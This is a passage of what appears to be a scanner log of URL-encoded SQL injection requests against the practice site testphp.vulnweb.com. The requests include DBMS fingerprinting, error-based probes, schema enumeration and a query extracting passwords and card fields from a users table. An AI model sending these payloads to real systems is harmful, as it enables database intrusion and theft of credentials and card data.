%201%20ELSE%200%20END%29%29%7C%7CCHAR%28113%2C112%2C107%2C106%2C113%29%2CNULL--%20DjIG\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-5361%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%2C120%2C112%2C106%2C113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28LAST_INSERT_ROWID%28%29%3DLAST_INSERT_ROWID%28%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHAR%28113%2C112%2C107%2C106%2C113%29%2CNULL--%20DjIG\",\"time\":\"356.469936ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.340642314Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-5496%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-5496%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-5496%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"343.676711ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":74,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.400795078Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-6195%20UNION%20ALL%20SELECT%20NULL%2C%27qxpjq%27%7C%7CIF%28CONCAT%28%27%27%2C%28IF%28DATEOB%28%29%3E%3DDATEOB%28NULL%29%2C1%2C0%29%29%29%20IS%20NULL%2C%27%20%27%2C%20CONCAT%28%27%27%2C%28IF%28DATEOB%28%29%3E%3DDATEOB%28NULL%29%2C1%2C0%29%29%29%29%7C%7C%27qpkjq%27%2CNULL%3B\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-6195%20UNION%20ALL%20SELECT%20NULL%2C%27qxpjq%27%7C%7CIF%28CONCAT%28%27%27%2C%28IF%28DATEOB%28%29%3E%3DDATEOB%28NULL%29%2C1%2C0%29%29%29%20IS%20NULL%2C%27%20%27%2C%20CONCAT%28%27%27%2C%28IF%28DATEOB%28%29%3E%3DDATEOB%28NULL%29%2C1%2C0%29%29%29%29%7C%7C%27qpkjq%27%2CNULL%3B\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-6195%20UNION%20ALL%20SELECT%20NULL%2C%27qxpjq%27%7C%7CIF%28CONCAT%28%27%27%2C%28IF%28DATEOB%28%29%3E%3DDATEOB%28NULL%29%2C1%2C0%29%29%29%20IS%20NULL%2C%27%20%27%2C%20CONCAT%28%27%27%2C%28IF%28DATEOB%28%29%3E%3DDATEOB%28NULL%29%2C1%2C0%29%29%29%29%7C%7C%27qpkjq%27%2CNULL%3B\",\"time\":\"351.276539ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.44432636Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-6440%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28%40%40transtate%3D%40%40transtate%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL--%20wmtL\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-6440%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28%40%40transtate%3D%40%40transtate%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL--%20wmtL\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-6440%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28%40%40transtate%3D%40%40transtate%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL--%20wmtL\",\"time\":\"356.258175ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.538505809Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7100%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2C%60name%60%2Caddress%2Ccart%2Ccc%2Cemail%2Cpass%2Cphone%2Cuname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.users--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7100%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2C%60name%60%2Caddress%2Ccart%2Ccc%2Cemail%2Cpass%2Cphone%2Cuname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.users--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-7100%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2C%60name%60%2Caddress%2Ccart%2Ccc%2Cemail%2Cpass%2Cphone%2Cuname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.users--%20-\",\"time\":\"355.918445ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":6,\"lines\":2,\"status_code\":200,\"content_length\":262,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.561758119Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7472%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x7573657273%20AND%20table_schema%3D0x616375617274--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7472%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x7573657273%20AND%20table_schema%3D0x616375617274--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-7472%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x7573657273%20AND%20table_schema%3D0x616375617274--%20-\",\"time\":\"349.003513ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":283,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.598555929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7782%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x4e6a72456d58664256455a625762434b7a66664c5869464a4c536d52796258686a715169626b5464%2C0x71706b6a71%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7782%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x4e6a72456d58664256455a625762434b7a66664c5869464a4c536d52796258686a715169626b5464%2C0x71706b6a71%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-7782%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x4e6a72456d58664256455a625762434b7a66664c5869464a4c536d52796258686a715169626b5464%2C0x71706b6a71%29--%20-\",\"time\":\"348.512909ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.867492215Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7833%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28UNICODE%28SQUARE%28NULL%29%29%20IS%20NULL%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL--%20rtvt\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7833%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28UNICODE%28SQUARE%28NULL%29%29%20IS%20NULL%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL--%20rtvt\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-7833%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28UNICODE%28SQUARE%28NULL%29%29%20IS%20NULL%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL--%20rtvt\",\"time\":\"348.749208ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.94311289Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7852%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x6361746567%20AND%20table_schema%3D0x616375617274--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-7852%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x6361746567%20AND%20table_schema%3D0x616375617274--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-7852%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccolumn_name%2Ccolumn_type%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x6361746567%20AND%20table_schema%3D0x616375617274--%20-\",\"time\":\"355.741133ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":200,\"content_length\":141,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.988071535Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8207%20UNION%20ALL%20SELECT%20NULL%2C%27qxpjq%27%7C%7C%28SELECT%20%28CASE%20WHEN%20%28signature%28NULL%29%3Dusignature%28NULL%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7C%27qpkjq%27%2CNULL--%20KKSe\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8207%20UNION%20ALL%20SELECT%20NULL%2C%27qxpjq%27%7C%7C%28SELECT%20%28CASE%20WHEN%20%28signature%28NULL%29%3Dusignature%28NULL%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7C%27qpkjq%27%2CNULL--%20KKSe\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-8207%20UNION%20ALL%20SELECT%20NULL%2C%27qxpjq%27%7C%7C%28SELECT%20%28CASE%20WHEN%20%28signature%28NULL%29%3Dusignature%28NULL%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7C%27qpkjq%27%2CNULL--%20KKSe\",\"time\":\"341.200012ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:56.150341146Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8258%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28TO_BASE64URL%28NULL%29%20IS%20NULL%29%20THEN%20CHR%2849%29%20ELSE%20CHR%2848%29%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20mdRc\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8258%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28TO_BASE64URL%28NULL%29%20IS%20NULL%29%20THEN%20CHR%2849%29%20ELSE%20CHR%2848%29%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20mdRc\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-8258%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28TO_BASE64URL%28NULL%29%20IS%20NULL%29%20THEN%20CHR%2849%29%20ELSE%20CHR%2848%29%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20mdRc\",\"time\":\"354.052391ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:59.54864387Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8310%20OR%201%20GROUP%20BY%20CONCAT%280x7162787a71%2C%28SELECT%20%28CASE%20WHEN%20%281792%3D1792%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b7a6271%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8310%20OR%201%20GROUP%20BY%20CONCAT%280x7162787a71%2C%28SELECT%20%28CASE%20WHEN%20%281792%3D1792%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b7a6271%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-8310%20OR%201%20GROUP%20BY%20CONCAT%280x7162787a71%2C%28SELECT%20%28CASE%20WHEN%20%281792%3D1792%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b7a6271%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23\",\"time\":\"353.007663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:59.6288952Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8910%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%7C%7CCHAR%28120%29%7C%7CCHAR%28112%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28CASEWHEN%281%3D1%2C1%2C0%29%3D1%29%20THEN%201%20ELSE%200%20END%29%20FROM%20INFORMATION_SCHEMA.SYSTEM_USERS%29%7C%7CCHAR%28113%29%7C%7CCHAR%28112%29%7C%7CCHAR%28107%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%2CNULL%20FROM%20INFORMATION_SCHEMA.SYSTEM_USERS--%20mNgf\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-8910%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%7C%7CCHAR%28120%29%7C%7CCHAR%28112%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28CASEWHEN%281%3D1%2C1%2C0%29%3D1%29%20THEN%201%20ELSE%200%20END%29%20FROM%20INFORMATION_SCHEMA.SYSTEM_USERS%29%7C%7CCHAR%28113%29%7C%7CCHAR%28112%29%7C%7CCHAR%28107%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%2CNULL%20FROM%20INFORMATION_SCHEMA.SYSTEM_USERS--%20mNgf\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-8910%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%7C%7CCHAR%28120%29%7C%7CCHAR%28112%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28CASEWHEN%281%3D1%2C1%2C0%29%3D1%29%20THEN%201%20ELSE%200%20END%29%20FROM%20INFORMATION_SCHEMA.SYSTEM_USERS%29%7C%7CCHAR%28113%29%7C%7CCHAR%28112%29%7C%7CCHAR%28107%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%2CNULL%20FROM%20INFORMATION_SCHEMA.SYSTEM_USERS--%20mNgf\",\"time\":\"361.401552ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:59.767090707Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-9119%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x51484b7a724e726a4a4e625a446857716d4968627a456b6f6d595a576178536e4e7247645954556a%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-9119%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x51484b7a724e726a4a4e625a446857716d4968627a456b6f6d595a576178536e4e7247645954556a%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-9119%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x51484b7a724e726a4a4e625a446857716d4968627a456b6f6d595a576178536e4e7247645954556a%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"350.830304ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.378144291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-9965%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28SESSION_USER%28%29%20LIKE%20USER%28%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-9965%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28SESSION_USER%28%29%20LIKE%20USER%28%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-9965%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28SESSION_USER%28%29%20LIKE%20USER%28%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"357.742006ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":74,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.378151586Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20%28SELECT%204217%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%284217%3D4217%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20%28SELECT%204217%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%284217%3D4217%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20%28SELECT%204217%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%284217%3D4217%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"time\":\"347.983368ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.378293084Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1\",\"time\":\"350.127442ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.385752207Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%287698%3D7698%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELEC